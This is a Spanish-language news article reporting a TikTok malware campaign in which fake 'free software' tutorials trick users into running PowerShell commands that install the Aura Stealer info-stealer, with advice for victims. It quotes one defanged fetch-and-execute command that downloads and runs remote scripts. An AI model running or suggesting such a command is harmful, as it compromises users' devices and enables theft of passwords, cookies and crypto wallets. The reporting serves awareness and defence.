Detectan campaña maliciosa en TikTok que distribuye malware con falsos tutoriales

ESTADOS UNIDOS.- Una nueva campaña maliciosa se está propagando en TikTok a través de videos que prometen obtener Windows, Netflix o Photoshop de forma gratuita, pero que en realidad instalan malware y roban información personal, de acuerdo con una investigación del experto en ciberseguridad Xavier Mertens, del SANS Internet Storm Center (ISC).

Tutoriales falsos, malware real

Los ciberdelincuentes aprovechan la popularidad y el alcance de TikTok para difundir videos breves en los que muestran supuestos “trucos” o “tutoriales” para acceder sin pagar a software o servicios premium.

Sin embargo, al seguir las instrucciones, las víctimas son inducidas a ejecutar comandos maliciosos en PowerShell, la consola del sistema operativo Windows, lo que termina por comprometer la seguridad del dispositivo.

Por ejemplo, uno de los videos analizados enseña a los usuarios a activar Photoshop con un comando como:

iex (irm slmgr[.]win/photoshop)

Este fragmento, lejos de desbloquear el programa, conecta el equipo a un servidor remoto desde donde se descargan y ejecutan nuevos scripts maliciosos.

Ingeniería social bajo el método “ClickFix”

Según el análisis publicado por Trend Micro, la campaña utiliza una técnica de ingeniería social conocida como ClickFix, la cual se basa en ofrecer soluciones rápidas a supuestos problemas técnicos.

El método ha sido detectado desde mayo de este año y, según los especialistas, ha evolucionado hasta convertirse en una de las tácticas más efectivas dentro de TikTok, donde los usuarios confían en tutoriales breves y aparentemente inofensivos.

Qué descarga realmente el malware

De acuerdo con el portal Bleeping Computer y los hallazgos de Mertens, el código descargado instala dos ejecutables:

Una variante del malware Aura Stealer, diseñado para robar contraseñas guardadas en navegadores, cookies de autenticación y billeteras de criptomonedas.

Un segundo programa capaz de compilar código bajo demanda, cuyo propósito aún se desconoce, aunque se sospecha que puede servir para adaptar o escalar el ataque dependiendo del perfil del usuario afectado.

TikTok, un canal atractivo para los ciberdelincuentes

El auge de TikTok como fuente de entretenimiento e información rápida ha convertido la plataforma en un terreno fértil para los engaños digitales.

“Es una forma muy eficaz de ingeniería social. La confianza en los creadores y la simplicidad del contenido hace que la gente actúe sin sospechar”, explicó Mertens en su reporte para el ISC.

Estos videos, disfrazados de consejos tecnológicos, logran captar la atención de usuarios de todas las edades, lo que aumenta el alcance del fraude.

Qué hacer si seguiste las instrucciones de estos videos

Los expertos advierten que, si un usuario ejecutó alguno de los comandos mostrados en TikTok, debe cambiar de inmediato todas sus contraseñas, especialmente las relacionadas con:

Correo electrónico

Redes sociales

Bancos o billeteras digitales

Plataformas de streaming como Netflix o Spotify

Además, se recomienda escanear el dispositivo con software antivirus actualizado y desconectarlo de redes importantes si se detecta actividad sospechosa.